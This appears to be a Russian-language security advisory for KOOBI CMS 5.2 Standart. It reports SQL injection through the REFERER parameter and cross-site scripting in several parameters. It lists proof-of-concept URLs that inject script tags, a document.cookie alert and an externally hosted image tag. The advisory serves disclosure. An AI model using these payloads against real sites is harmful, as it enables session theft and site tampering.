Программа: KOOBI CMS 5.2 Standart

Уязвимость позволяет удаленному пользователю произвести XSS нападении и
выполнить произвольные SQL команды в базе данных приложения.

1. Уязвимость существует из-за недостаточной обработки входных данных в
параметре REFERER в сценарии index.php. Удаленный пользователь может с помощью
специально сформированного запроса выполнить произвольные SQL команды в базе
данных приложения.

2. Уязвимость существует из-за недостаточной обработки входных данных в
различных параметрах. Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольный код сценарий в браузере жертвы в
контексте безопасности уязвимого сайта.

Примеры:

http://KOOIBI_SITE/admin/stats.php?pp=5&sort=id&order=DESC&action=referer& page=2<img%20src=http://ghc.ru/images/rstghc.gif>

http://KOOBI_SITE/index.php?charakter=&type=&p=articles&area=1&categ=2&ud=&selby=&show=&
pp=15%22%3E%3Cimg%20src=http://ghc.ru/images/rstghc.gif%3E%3C%22&page=3

http://site/index.php?pp=73025"><script>alert()</script><& sort=name&categ=1&parent=0&p=links&area=1

http://site/index.php?pp=&sort=name&categ=1&parent=23678">< script>alert(document.cookie)</script><&p=links&area=1

http://site/index.php?p=forum&action=print&what=posting&id=56480">< script>alert()</script><&area=1

http://site/index.php?p=forum&action=print&what=posting&id=24515">< script>alert()</script><&area=1&print=1

http://site/index.php?p=showtopic&toid=2&fid=76126">< script>alert()</script>&area=1

http://site/index.php?showlink=1&fid=25265">< script>alert()</script>&p=links&area=1&categ=1&
koobi=4f6d4236d06ed22c1f66ee363b3899b0

http://site/index.php?showlink=1&fid=2&p=links&area=1&categ=1">< script>alert()</script>2&koobi=4f6d4236d06ed22c1f66ee363b3899b0

http://site/index.php?categ=1&parent=85659">< script>alert()</script><"77798&p=links&area=1

http://koobi.com/index.php?categ=1&parent=49797">< script>alert()</script><"97048&p=links&area=1&print=1

 

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии